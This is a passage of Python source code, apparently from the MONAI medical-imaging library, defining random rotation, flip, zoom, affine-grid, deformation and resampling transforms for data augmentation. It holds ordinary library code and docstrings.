    def __init__(self, prob: float = 0.1, max_k: int = 3, spatial_axes: Tuple[int, int] = (0, 1)) -> None:
        """
        Args:
            prob: probability of rotating.
                (Default 0.1, with 10% probability it returns a rotated array)
            max_k: number of rotations will be sampled from `np.random.randint(max_k) + 1`, (Default 3).
            spatial_axes: 2 int numbers, defines the plane to rotate with 2 spatial axes.
                Default: (0, 1), this is the first two axis in spatial dimensions.
        """
        RandomizableTransform.__init__(self, prob)
        self.max_k = max_k
        self.spatial_axes = spatial_axes
        self._rand_k = 0  # number of 90-degree turns, drawn in randomize()

    def randomize(self, data: Optional[Any] = None) -> None:
        super().randomize(None)
        if self._do_transform:
            # sample 1..max_k quarter turns
            self._rand_k = self.R.randint(self.max_k) + 1

    def __call__(self, img: NdarrayOrTensor, randomize: bool = True) -> NdarrayOrTensor:
        """
        Args:
            img: channel first array, must have shape: (num_channels, H[, W, ..., ]),
            randomize: whether to execute `randomize()` function first, default to True.
        """
        if randomize:
            self.randomize()
        return Rotate90(self._rand_k, self.spatial_axes)(img) if self._do_transform else img
class RandRotate(RandomizableTransform):
    """
    Randomly rotate the input arrays.
    Args:
        range_x: Range of rotation angle in radians in the plane defined by the first and second axes.
            If single number, angle is uniformly sampled from (-range_x, range_x).
        range_y: Range of rotation angle in radians in the plane defined by the first and third axes.
            If single number, angle is uniformly sampled from (-range_y, range_y).
        range_z: Range of rotation angle in radians in the plane defined by the second and third axes.
            If single number, angle is uniformly sampled from (-range_z, range_z).
        prob: Probability of rotation.
        keep_size: If it is False, the output shape is adapted so that the
            input array is contained completely in the output.
            If it is True, the output shape is the same as the input. Default is True.
        mode: {``"bilinear"``, ``"nearest"``}
            Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
            See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
        padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
            Padding mode for outside grid values. Defaults to ``"border"``.
            See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
        align_corners: Defaults to False.
            See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
        dtype: data type for resampling computation. Defaults to ``np.float32``.
            If None, use the data type of input data. To be compatible with other modules,
            the output data type is always ``np.float32``.
    """
    backend = Rotate.backend
    def __init__(
        self,
        range_x: Union[Tuple[float, float], float] = 0.0,
        range_y: Union[Tuple[float, float], float] = 0.0,
        range_z: Union[Tuple[float, float], float] = 0.0,
        prob: float = 0.1,
        keep_size: bool = True,
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
        align_corners: bool = False,
        dtype: Union[DtypeLike, torch.dtype] = np.float32,
    ) -> None:
        RandomizableTransform.__init__(self, prob)
        # a single number x is expanded to the symmetric sampling range (-x, x)
        self.range_x = ensure_tuple(range_x)
        if len(self.range_x) == 1:
            self.range_x = tuple(sorted([-self.range_x[0], self.range_x[0]]))
        self.range_y = ensure_tuple(range_y)
        if len(self.range_y) == 1:
            self.range_y = tuple(sorted([-self.range_y[0], self.range_y[0]]))
        self.range_z = ensure_tuple(range_z)
        if len(self.range_z) == 1:
            self.range_z = tuple(sorted([-self.range_z[0], self.range_z[0]]))
        self.keep_size = keep_size
        self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
        self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
        self.align_corners = align_corners
        self.dtype = dtype
        # sampled rotation angles (radians) per plane; set in randomize()
        self.x = 0.0
        self.y = 0.0
        self.z = 0.0
    def randomize(self, data: Optional[Any] = None) -> None:
        super().randomize(None)
        if not self._do_transform:
            return None
        self.x = self.R.uniform(low=self.range_x[0], high=self.range_x[1])
        self.y = self.R.uniform(low=self.range_y[0], high=self.range_y[1])
        self.z = self.R.uniform(low=self.range_z[0], high=self.range_z[1])
    def __call__(
        self,
        img: NdarrayOrTensor,
        mode: Optional[Union[GridSampleMode, str]] = None,
        padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
        align_corners: Optional[bool] = None,
        dtype: Union[DtypeLike, torch.dtype] = None,
        randomize: bool = True,
        get_matrix: bool = False,
    ):
        """
        Args:
            img: channel first array, must have shape 2D: (nchannels, H, W), or 3D: (nchannels, H, W, D).
            mode: {``"bilinear"``, ``"nearest"``}
                Interpolation mode to calculate output values. Defaults to ``self.mode``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
                Padding mode for outside grid values. Defaults to ``self.padding_mode``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            align_corners: Defaults to ``self.align_corners``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            dtype: data type for resampling computation. Defaults to ``self.dtype``.
                If None, use the data type of input data. To be compatible with other modules,
                the output data type is always ``np.float32``.
            randomize: whether to execute `randomize()` function first, default to True.
            get_matrix: whether to return the rotated image and rotate matrix together, default to False.
        """
        if randomize:
            self.randomize()
        if not self._do_transform:
            return img
        rotator = Rotate(
            # 2D input (chn, H, W): only the x angle applies; 3D uses all three
            angle=self.x if img.ndim == 3 else (self.x, self.y, self.z),
            keep_size=self.keep_size,
            mode=look_up_option(mode or self.mode, GridSampleMode),
            padding_mode=look_up_option(padding_mode or self.padding_mode, GridSamplePadMode),
            align_corners=self.align_corners if align_corners is None else align_corners,
            dtype=dtype or self.dtype or img.dtype,
        )
        img = rotator(img)
        return (img, rotator.get_rotation_matrix()) if get_matrix else img
class RandFlip(RandomizableTransform):
    """
    Randomly flips the image along axes. Preserves shape.
    See numpy.flip for additional details.
    https://docs.scipy.org/doc/numpy/reference/generated/numpy.flip.html

    Args:
        prob: Probability of flipping.
        spatial_axis: Spatial axes along which to flip over. Default is None.
    """

    backend = Flip.backend

    def __init__(self, prob: float = 0.1, spatial_axis: Optional[Union[Sequence[int], int]] = None) -> None:
        RandomizableTransform.__init__(self, prob)
        # the deterministic flip applied whenever the coin flip succeeds
        self.flipper = Flip(spatial_axis=spatial_axis)

    def __call__(self, img: NdarrayOrTensor, randomize: bool = True) -> NdarrayOrTensor:
        """
        Args:
            img: channel first array, must have shape: (num_channels, H[, W, ..., ]),
            randomize: whether to execute `randomize()` function first, default to True.
        """
        if randomize:
            self.randomize(None)
        return self.flipper(img) if self._do_transform else img
class RandAxisFlip(RandomizableTransform):
    """
    Randomly select a spatial axis and flip along it.
    See numpy.flip for additional details.
    https://docs.scipy.org/doc/numpy/reference/generated/numpy.flip.html

    Args:
        prob: Probability of flipping.
    """

    backend = Flip.backend

    def __init__(self, prob: float = 0.1) -> None:
        RandomizableTransform.__init__(self, prob)
        # spatial axis chosen in randomize(); None until first draw
        self._axis: Optional[int] = None

    def randomize(self, data: NdarrayOrTensor) -> None:
        super().randomize(None)
        if self._do_transform:
            # pick one of the spatial axes (the channel dim is excluded)
            self._axis = self.R.randint(data.ndim - 1)

    def __call__(self, img: NdarrayOrTensor, randomize: bool = True) -> NdarrayOrTensor:
        """
        Args:
            img: channel first array, must have shape: (num_channels, H[, W, ..., ]),
            randomize: whether to execute `randomize()` function first, default to True.
        """
        if randomize:
            self.randomize(data=img)
        return Flip(spatial_axis=self._axis)(img) if self._do_transform else img
class RandZoom(RandomizableTransform):
"""
Randomly zooms input arrays with given probability within given zoom range.
Args:
prob: Probability of zooming.
min_zoom: Min zoom factor. Can be float or sequence same size as image.
If a float, select a random factor from `[min_zoom, max_zoom]` then apply to all spatial dims
to keep the original spatial shape ratio.
If a sequence, min_zoom should contain one value for each spatial axis.
If 2 values provided for 3D data, use the first value for both H & W dims to keep the same zoom ratio.
max_zoom: Max zoom factor. Can be float or sequence same size as image.
If a float, select a random factor from `[min_zoom, max_zoom]` then apply to all spatial dims
to keep the original spatial shape ratio.
If a sequence, max_zoom should contain one value for each spatial axis.
If 2 values provided for 3D data, use the first value for both H & W dims to keep the same zoom ratio.
mode: {``"nearest"``, ``"linear"``, ``"bilinear"``, ``"bicubic"``, ``"trilinear"``, ``"area"``}
The interpolation mode. Defaults to ``"area"``.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
padding_mode: available modes for numpy array:{``"constant"``, ``"edge"``, ``"linear_ramp"``, ``"maximum"``,
``"mean"``, ``"median"``, ``"minimum"``, ``"reflect"``, ``"symmetric"``, ``"wrap"``, ``"empty"``}
available modes for PyTorch Tensor: {``"constant"``, ``"reflect"``, ``"replicate"``, ``"circular"``}.
One of the listed string values or a user supplied function. Defaults to ``"constant"``.
The mode to pad data after zooming.
See also: https://numpy.org/doc/1.18/reference/generated/numpy.pad.html
https://pytorch.org/docs/stable/generated/torch.nn.functional.pad.html
align_corners: This only has an effect when mode is
'linear', 'bilinear', 'bicubic' or 'trilinear'. Default: None.
See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
keep_size: Should keep original size (pad if needed), default is True.
kwargs: other arguments for the `np.pad` or `torch.pad` function.
note that `np.pad` treats channel dimension as the first dimension.
"""
backend = Zoom.backend
def __init__(
self,
prob: float = 0.1,
min_zoom: Union[Sequence[float], float] = 0.9,
max_zoom: Union[Sequence[float], float] = 1.1,
mode: Union[InterpolateMode, str] = InterpolateMode.AREA,
padding_mode: Union[NumpyPadMode, PytorchPadMode, str] = NumpyPadMode.EDGE,
align_corners: Optional[bool] = None,
keep_size: bool = True,
**kwargs,
) -> None:
RandomizableTransform.__init__(self, prob)
self.min_zoom = ensure_tuple(min_zoom)
self.max_zoom = ensure_tuple(max_zoom)
if len(self.min_zoom) != len(self.max_zoom):
raise AssertionError("min_zoom and max_zoom must have same length.")
self.mode: InterpolateMode = look_up_option(mode, InterpolateMode)
self.padding_mode = padding_mode
self.align_corners = align_corners
self.keep_size = keep_size
self.kwargs = kwargs
self._zoom: Sequence[float] = [1.0]
def randomize(self, img: NdarrayOrTensor) -> None:
super().randomize(None)
if not self._do_transform:
return None
self._zoom = [self.R.uniform(l, h) for l, h in zip(self.min_zoom, self.max_zoom)]
if len(self._zoom) == 1:
# to keep the spatial shape ratio, use same random zoom factor for all dims
self._zoom = ensure_tuple_rep(self._zoom[0], img.ndim - 1)
elif len(self._zoom) == 2 and img.ndim > 3:
# if 2 zoom factors provided for 3D data, use the first factor for H and W dims, second factor for D dim
self._zoom = ensure_tuple_rep(self._zoom[0], img.ndim - 2) + ensure_tuple(self._zoom[-1])
def __call__(
    self,
    img: NdarrayOrTensor,
    mode: Optional[Union[InterpolateMode, str]] = None,
    padding_mode: Optional[Union[NumpyPadMode, PytorchPadMode, str]] = None,
    align_corners: Optional[bool] = None,
    randomize: bool = True,
) -> NdarrayOrTensor:
    """
    Args:
        img: channel first array, must have shape 2D: (nchannels, H, W), or 3D: (nchannels, H, W, D).
        mode: {``"nearest"``, ``"linear"``, ``"bilinear"``, ``"bicubic"``, ``"trilinear"``, ``"area"``}
            The interpolation mode. Defaults to ``self.mode``.
            See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
        padding_mode: available modes for numpy array:{``"constant"``, ``"edge"``, ``"linear_ramp"``, ``"maximum"``,
            ``"mean"``, ``"median"``, ``"minimum"``, ``"reflect"``, ``"symmetric"``, ``"wrap"``, ``"empty"``}
            available modes for PyTorch Tensor: {``"constant"``, ``"reflect"``, ``"replicate"``, ``"circular"``}.
            One of the listed string values or a user supplied function. Defaults to ``"constant"``.
            The mode to pad data after zooming.
            See also: https://numpy.org/doc/1.18/reference/generated/numpy.pad.html
            https://pytorch.org/docs/stable/generated/torch.nn.functional.pad.html
        align_corners: This only has an effect when mode is
            'linear', 'bilinear', 'bicubic' or 'trilinear'. Defaults to ``self.align_corners``.
            See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
        randomize: whether to execute `randomize()` function first, default to True.
    """
    if randomize:
        # draw zoom factors matched to the spatial rank of `img`
        self.randomize(img=img)
    if not self._do_transform:
        return img
    # Use explicit `is None` checks rather than `x or self.x`: with the `or` form an
    # explicit `align_corners=False` would silently fall back to `self.align_corners`,
    # because False is falsy.
    return Zoom(
        self._zoom,
        keep_size=self.keep_size,
        mode=look_up_option(self.mode if mode is None else mode, InterpolateMode),
        padding_mode=self.padding_mode if padding_mode is None else padding_mode,
        align_corners=self.align_corners if align_corners is None else align_corners,
        **self.kwargs,
    )(img)
class AffineGrid(Transform):
    """
    Affine transforms on the coordinates.

    Args:
        rotate_params: a rotation angle in radians, a scalar for 2D image, a tuple of 3 floats for 3D.
            Defaults to no rotation.
        shear_params: shearing factors for affine matrix, take a 3D affine as example::

            [
                [1.0, params[0], params[1], 0.0],
                [params[2], 1.0, params[3], 0.0],
                [params[4], params[5], 1.0, 0.0],
                [0.0, 0.0, 0.0, 1.0],
            ]

            a tuple of 2 floats for 2D, a tuple of 6 floats for 3D. Defaults to no shearing.
        translate_params: a tuple of 2 floats for 2D, a tuple of 3 floats for 3D. Translation is in
            pixel/voxel relative to the center of the input image. Defaults to no translation.
        scale_params: scale factor for every spatial dims. a tuple of 2 floats for 2D,
            a tuple of 3 floats for 3D. Defaults to `1.0`.
        dtype: data type for the grid computation. Defaults to ``np.float32``.
            If ``None``, use the data type of input data (if `grid` is provided).
        device: device on which the tensor will be allocated, if a new grid is generated.
        affine: If applied, ignore the params (`rotate_params`, etc.) and use the
            supplied matrix. Should be square with each side = num of image spatial
            dimensions + 1.

    .. deprecated:: 0.6.0
        ``as_tensor_output`` is deprecated.

    """

    backend = [TransformBackends.TORCH, TransformBackends.NUMPY]

    @deprecated_arg(name="as_tensor_output", since="0.6")
    def __init__(
        self,
        rotate_params: Optional[Union[Sequence[float], float]] = None,
        shear_params: Optional[Union[Sequence[float], float]] = None,
        translate_params: Optional[Union[Sequence[float], float]] = None,
        scale_params: Optional[Union[Sequence[float], float]] = None,
        as_tensor_output: bool = True,
        device: Optional[torch.device] = None,
        dtype: DtypeLike = np.float32,
        affine: Optional[NdarrayOrTensor] = None,
    ) -> None:
        # parameters are only stored here; the matrix is built lazily in __call__
        self.rotate_params = rotate_params
        self.shear_params = shear_params
        self.translate_params = translate_params
        self.scale_params = scale_params
        self.device = device
        self.dtype = dtype
        self.affine = affine

    def __call__(
        self, spatial_size: Optional[Sequence[int]] = None, grid: Optional[NdarrayOrTensor] = None
    ) -> Tuple[NdarrayOrTensor, NdarrayOrTensor]:
        """
        The grid can be initialized with a `spatial_size` parameter, or provided directly as `grid`.
        Therefore, either `spatial_size` or `grid` must be provided.
        When initialising from `spatial_size`, the backend "torch" will be used.

        Args:
            spatial_size: output grid size.
            grid: grid to be transformed. Shape must be (3, H, W) for 2D or (4, H, W, D) for 3D.

        Returns:
            the transformed grid and the affine matrix that was applied to it.

        Raises:
            ValueError: When ``grid=None`` and ``spatial_size=None``. Incompatible values.

        """
        if grid is None:  # create grid from spatial_size
            if spatial_size is None:
                raise ValueError("Incompatible values: grid=None and spatial_size=None.")
            grid = create_grid(spatial_size, device=self.device, backend="torch", dtype=self.dtype)
        # pick the compute backend/device from the grid actually provided
        _b = TransformBackends.TORCH if isinstance(grid, torch.Tensor) else TransformBackends.NUMPY
        _device = grid.device if isinstance(grid, torch.Tensor) else self.device
        affine: NdarrayOrTensor
        if self.affine is None:
            # build the matrix from the individual params; the grid has one extra
            # (homogeneous) channel, so the matrix is (spatial_dims+1) square
            spatial_dims = len(grid.shape) - 1
            affine = (
                torch.eye(spatial_dims + 1, device=_device)
                if _b == TransformBackends.TORCH
                else np.eye(spatial_dims + 1)
            )
            # compose in rotate -> shear -> translate -> scale order;
            # falsy params (None / 0) leave the matrix unchanged
            if self.rotate_params:
                affine = affine @ create_rotate(spatial_dims, self.rotate_params, device=_device, backend=_b)
            if self.shear_params:
                affine = affine @ create_shear(spatial_dims, self.shear_params, device=_device, backend=_b)
            if self.translate_params:
                affine = affine @ create_translate(spatial_dims, self.translate_params, device=_device, backend=_b)
            if self.scale_params:
                affine = affine @ create_scale(spatial_dims, self.scale_params, device=_device, backend=_b)
        else:
            # explicit matrix overrides the individual params
            affine = self.affine

        # compute as torch tensors, with the affine cast to match the grid
        grid, *_ = convert_data_type(grid, torch.Tensor, device=_device, dtype=self.dtype or grid.dtype)
        affine, *_ = convert_to_dst_type(affine, grid)

        # apply the matrix to every coordinate: flatten spatial dims, matmul, reshape back
        grid = (affine @ grid.reshape((grid.shape[0], -1))).reshape([-1] + list(grid.shape[1:]))
        return grid, affine
class RandAffineGrid(Randomizable, Transform):
    """
    Generate randomised affine grid.
    """

    backend = AffineGrid.backend

    @deprecated_arg(name="as_tensor_output", since="0.6")
    def __init__(
        self,
        rotate_range: RandRange = None,
        shear_range: RandRange = None,
        translate_range: RandRange = None,
        scale_range: RandRange = None,
        as_tensor_output: bool = True,
        device: Optional[torch.device] = None,
    ) -> None:
        """
        Args:
            rotate_range: angle range in radians. If element `i` is a pair of (min, max) values, then
                `uniform[-rotate_range[i][0], rotate_range[i][1])` is drawn for the `i`th spatial
                dimension; a plain number `x` means `uniform[-x, x)`. Entries may differ per
                dimension, e.g. `((0,3), 1, ...)`; dimensions without an entry (or `None`) get no
                rotation parameter.
            shear_range: shearing factor ranges, same per-dimension format as `rotate_range`
                (2 factors for 2D, 6 for 3D), filling the off-diagonal entries of the affine
                matrix, e.g. for 3D::

                    [
                        [1.0, params[0], params[1], 0.0],
                        [params[2], 1.0, params[3], 0.0],
                        [params[4], params[5], 1.0, 0.0],
                        [0.0, 0.0, 0.0, 1.0],
                    ]

            translate_range: voxel translation ranges, same per-dimension format as `rotate_range`.
            scale_range: scaling ranges, same per-dimension format as `rotate_range`; 1.0 is added
                to each drawn value, so 0 corresponds to no scaling.
            device: device to store the output grid data.

        See also:
            - :py:meth:`monai.transforms.utils.create_rotate`
            - :py:meth:`monai.transforms.utils.create_shear`
            - :py:meth:`monai.transforms.utils.create_translate`
            - :py:meth:`monai.transforms.utils.create_scale`

        .. deprecated:: 0.6.0
            ``as_tensor_output`` is deprecated.

        """
        self.rotate_range = ensure_tuple(rotate_range)
        self.shear_range = ensure_tuple(shear_range)
        self.translate_range = ensure_tuple(translate_range)
        self.scale_range = ensure_tuple(scale_range)
        # most recently sampled parameters; populated by randomize()
        self.rotate_params: Optional[List[float]] = None
        self.shear_params: Optional[List[float]] = None
        self.translate_params: Optional[List[float]] = None
        self.scale_params: Optional[List[float]] = None
        self.device = device
        # most recently applied affine matrix; populated by __call__()
        self.affine: Optional[NdarrayOrTensor] = None

    def _get_rand_param(self, param_range, add_scalar: float = 0.0):
        """Draw one value per configured entry of ``param_range`` (plus ``add_scalar``)."""
        sampled = []
        for bound in param_range:
            if issequenceiterable(bound):
                if len(bound) != 2:
                    raise ValueError("If giving range as [min,max], should only have two elements per dim.")
                sampled.append(self.R.uniform(bound[0], bound[1]) + add_scalar)
            elif bound is not None:
                # scalar bound means a symmetric interval [-bound, bound)
                sampled.append(self.R.uniform(-bound, bound) + add_scalar)
        return sampled

    def randomize(self, data: Optional[Any] = None) -> None:
        # the four draws happen in a fixed order so seeded runs stay reproducible
        self.rotate_params = self._get_rand_param(self.rotate_range)
        self.shear_params = self._get_rand_param(self.shear_range)
        self.translate_params = self._get_rand_param(self.translate_range)
        # +1.0 so that a drawn 0 corresponds to a scale factor of 1 (identity)
        self.scale_params = self._get_rand_param(self.scale_range, 1.0)

    def __call__(
        self, spatial_size: Optional[Sequence[int]] = None, grid: Optional[NdarrayOrTensor] = None
    ) -> NdarrayOrTensor:
        """
        Randomise the affine parameters and return the transformed grid.

        Args:
            spatial_size: output grid size.
            grid: grid to be transformed. Shape must be (3, H, W) for 2D or (4, H, W, D) for 3D.

        Returns:
            a 2D (3xHxW) or 3D (4xHxWxD) grid.
        """
        self.randomize()
        grid_factory = AffineGrid(
            rotate_params=self.rotate_params,
            shear_params=self.shear_params,
            translate_params=self.translate_params,
            scale_params=self.scale_params,
            device=self.device,
        )
        out_grid, self.affine = grid_factory(spatial_size, grid)
        return out_grid

    def get_transformation_matrix(self) -> Optional[NdarrayOrTensor]:
        """Get the most recently applied transformation matrix"""
        return self.affine
class RandDeformGrid(Randomizable, Transform):
    """
    Generate random deformation grid.
    """

    backend = [TransformBackends.TORCH]

    def __init__(
        self,
        spacing: Union[Sequence[float], float],
        magnitude_range: Tuple[float, float],
        as_tensor_output: bool = True,
        device: Optional[torch.device] = None,
    ) -> None:
        """
        Args:
            spacing: spacing of the control points in 2D or 3D, e.g. spacing=(1, 1) is
                pixel-wise deformation in 2D, spacing=(1, 1, 1) voxel-wise in 3D, and
                spacing=(2, 2) places a control point on every other pixel in 2D.
            magnitude_range: random offsets are drawn from
                `uniform[magnitude[0], magnitude[1])`.
            as_tensor_output: whether to output tensor instead of numpy array.
                defaults to True.
            device: device to store the output grid data.
        """
        self.spacing = spacing
        self.magnitude = magnitude_range
        # refreshed on every randomize() call
        self.rand_mag = 1.0
        self.as_tensor_output = as_tensor_output
        self.random_offset: np.ndarray
        self.device = device

    def randomize(self, grid_size: Sequence[int]) -> None:
        """Draw a fresh gaussian offset field over ``grid_size`` and a global magnitude."""
        offset_shape = [len(grid_size), *grid_size]
        self.random_offset = self.R.normal(size=offset_shape).astype(np.float32, copy=False)
        self.rand_mag = self.R.uniform(self.magnitude[0], self.magnitude[1])

    def __call__(self, spatial_size: Sequence[int]):
        """
        Args:
            spatial_size: spatial size of the grid.
        """
        ndim = len(spatial_size)
        self.spacing = fall_back_tuple(self.spacing, (1.0,) * ndim)
        control_grid = create_control_grid(spatial_size, self.spacing, device=self.device, backend="torch")
        self.randomize(control_grid.shape[1:])
        scaled_offset, *_ = convert_to_dst_type(self.rand_mag * self.random_offset, control_grid)
        # perturb only the spatial coordinate channels; the extra channel stays intact
        control_grid[:ndim] += scaled_offset
        if not self.as_tensor_output:
            control_grid, *_ = convert_data_type(control_grid, output_type=np.ndarray, dtype=np.float32)
        return control_grid
class Resample(Transform):
    """Sample an image at the locations described by a coordinate grid (see ``__call__``)."""

    backend = [TransformBackends.TORCH]

    @deprecated_arg(name="as_tensor_output", since="0.6")
    def __init__(
        self,
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
        as_tensor_output: bool = True,
        norm_coords: bool = True,
        device: Optional[torch.device] = None,
        dtype: DtypeLike = np.float64,
    ) -> None:
        """
        computes output image using values from `img`, locations from `grid` using pytorch.
        supports spatially 2D or 3D (num_channels, H, W[, D]).

        Args:
            mode: {``"bilinear"``, ``"nearest"``}
                Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
                Padding mode for outside grid values. Defaults to ``"border"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
                When `USE_COMPILED` is `True`, this argument uses
                ``"nearest"``, ``"bilinear"``, ``"bicubic"`` to indicate 0, 1, 3 order interpolations.
                See also: https://docs.monai.io/en/stable/networks.html#grid-pull
            norm_coords: whether to normalize the coordinates from `[-(size-1)/2, (size-1)/2]` to
                `[0, size - 1]` (for ``monai/csrc`` implementation) or
                `[-1, 1]` (for torch ``grid_sample`` implementation) to be compatible with the underlying
                resampling API.
            device: device on which the tensor will be allocated.
            dtype: data type for resampling computation. Defaults to ``np.float64`` for best precision.
                If ``None``, use the data type of input data. To be compatible with other modules,
                the output data type is always `float32`.

        .. deprecated:: 0.6.0
            ``as_tensor_output`` is deprecated.

        """
        self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
        self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
        self.norm_coords = norm_coords
        self.device = device
        self.dtype = dtype

    def __call__(
        self,
        img: NdarrayOrTensor,
        grid: Optional[NdarrayOrTensor] = None,
        mode: Optional[Union[GridSampleMode, str]] = None,
        padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
        dtype: DtypeLike = None,
    ) -> NdarrayOrTensor:
        """
        Args:
            img: shape must be (num_channels, H, W[, D]).
            grid: shape must be (3, H, W) for 2D or (4, H, W, D) for 3D.
                if ``norm_coords`` is True, the grid values must be in `[-(size-1)/2, (size-1)/2]`.
                if ``USE_COMPILED=True`` and ``norm_coords=False``, grid values must be in `[0, size-1]`.
                if ``USE_COMPILED=False`` and ``norm_coords=False``, grid values must be in `[-1, 1]`.
            mode: {``"bilinear"``, ``"nearest"``}
                Interpolation mode to calculate output values. Defaults to ``self.mode``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
                When `USE_COMPILED` is `True`, this argument uses
                ``"nearest"``, ``"bilinear"``, ``"bicubic"`` to indicate 0, 1, 3 order interpolations.
                See also: https://docs.monai.io/en/stable/networks.html#grid-pull
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
                Padding mode for outside grid values. Defaults to ``self.padding_mode``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            dtype: data type for resampling computation. Defaults to ``self.dtype``.
                To be compatible with other modules, the output data type is always `float32`.

        Raises:
            ValueError: when ``grid`` is not provided.

        See also:
            :py:const:`monai.config.USE_COMPILED`
        """
        if grid is None:
            raise ValueError("Unknown grid.")
        # prefer the image's own device when it is already a tensor
        _device = img.device if isinstance(img, torch.Tensor) else self.device
        _dtype = dtype or self.dtype or img.dtype
        img_t, *_ = convert_data_type(img, torch.Tensor, device=_device, dtype=_dtype)
        grid_t = convert_to_dst_type(grid, img_t)[0]
        if grid_t is grid:  # copy if needed (convert_data_type converts to contiguous)
            grid_t = grid_t.clone(memory_format=torch.contiguous_format)
        # number of spatial dims handled (at most 3); grid has sr+1 channels,
        # the last one being the homogeneous coordinate
        sr = min(len(img_t.shape[1:]), 3)
        if USE_COMPILED:
            if self.norm_coords:
                for i, dim in enumerate(img_t.shape[1 : 1 + sr]):
                    # shift centered coords to [0, dim-1] and divide by the homogeneous channel
                    grid_t[i] = (max(dim, 2) / 2.0 - 0.5 + grid_t[i]) / grid_t[-1:]
            # grid_pull expects the coordinate channels as the trailing axis
            grid_t = moveaxis(grid_t[:sr], 0, -1)  # type: ignore
            _padding_mode = self.padding_mode if padding_mode is None else padding_mode
            _padding_mode = _padding_mode.value if isinstance(_padding_mode, GridSamplePadMode) else _padding_mode
            # grid_pull encodes "reflection" as boundary code 1; other names pass through
            bound = 1 if _padding_mode == "reflection" else _padding_mode
            _interp_mode = self.mode if mode is None else mode
            _interp_mode = _interp_mode.value if isinstance(_interp_mode, GridSampleMode) else _interp_mode
            # map names to grid_pull's order-style codes (1: bilinear, 3: bicubic)
            if _interp_mode == "bicubic":
                interp = 3
            elif _interp_mode == "bilinear":
                interp = 1
            else:
                interp = _interp_mode  # type: ignore
            out = grid_pull(
                img_t.unsqueeze(0), grid_t.unsqueeze(0), bound=bound, extrapolate=True, interpolation=interp
            )[0]
        else:
            if self.norm_coords:
                for i, dim in enumerate(img_t.shape[1 : 1 + sr]):
                    # scale centered coords to [-1, 1] and divide by the homogeneous channel
                    grid_t[i] = 2.0 / (max(2, dim) - 1.0) * grid_t[i] / grid_t[-1:]
            # torch grid_sample expects coordinates in reversed (x, y[, z]) axis order,
            # with the coordinate channels as the trailing axis
            index_ordering: List[int] = list(range(sr - 1, -1, -1))
            grid_t = moveaxis(grid_t[index_ordering], 0, -1)  # type: ignore
            out = torch.nn.functional.grid_sample(
                img_t.unsqueeze(0),
                grid_t.unsqueeze(0),
                mode=self.mode.value if mode is None else GridSampleMode(mode).value,
                padding_mode=self.padding_mode.value if padding_mode is None else GridSamplePadMode(padding_mode).value,
                align_corners=True,
            )[0]
        # output matches the input container type, always as float32
        out_val, *_ = convert_to_dst_type(out, dst=img, dtype=np.float32)
        return out_val
class Affine(Transform):
    """
    Transform ``img`` given the affine parameters.
    A tutorial is available: https://github.com/Project-MONAI/tutorials/blob/0.6.0/modules/transforms_demo_2d.ipynb.
    """

    backend = list(set(AffineGrid.backend) & set(Resample.backend))

    @deprecated_arg(name="as_tensor_output", since="0.6")
    def __init__(
        self,
        rotate_params: Optional[Union[Sequence[float], float]] = None,
        shear_params: Optional[Union[Sequence[float], float]] = None,
        translate_params: Optional[Union[Sequence[float], float]] = None,
        scale_params: Optional[Union[Sequence[float], float]] = None,
        affine: Optional[NdarrayOrTensor] = None,
        spatial_size: Optional[Union[Sequence[int], int]] = None,
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.REFLECTION,
        norm_coords: bool = True,
        as_tensor_output: bool = True,
        device: Optional[torch.device] = None,
        dtype: DtypeLike = np.float32,
        image_only: bool = False,
    ) -> None:
        """
        The affine transformations are applied in rotate, shear, translate, scale order.

        Args:
            rotate_params: rotation angle(s) in radians — a scalar for 2D, a tuple of 3 floats
                for 3D. Defaults to no rotation.
            shear_params: shearing factors filling the off-diagonal of the affine matrix
                (a tuple of 2 floats for 2D, 6 floats for 3D), e.g. for 3D::

                    [
                        [1.0, params[0], params[1], 0.0],
                        [params[2], 1.0, params[3], 0.0],
                        [params[4], params[5], 1.0, 0.0],
                        [0.0, 0.0, 0.0, 1.0],
                    ]

                Defaults to no shearing.
            translate_params: translation in pixels/voxels relative to the centre of the input
                image (a tuple of 2 floats for 2D, 3 floats for 3D). Defaults to no translation.
            scale_params: per-spatial-dim scale factors (a tuple of 2 floats for 2D, 3 floats
                for 3D). Defaults to `1.0`.
            affine: if provided, this explicit matrix is used and the individual params above
                are ignored. Should be square with each side = num of image spatial dims + 1.
            spatial_size: output image spatial size. When unset (or smaller than 1) the input's
                spatial size is used; non-positive components fall back per dimension, e.g.
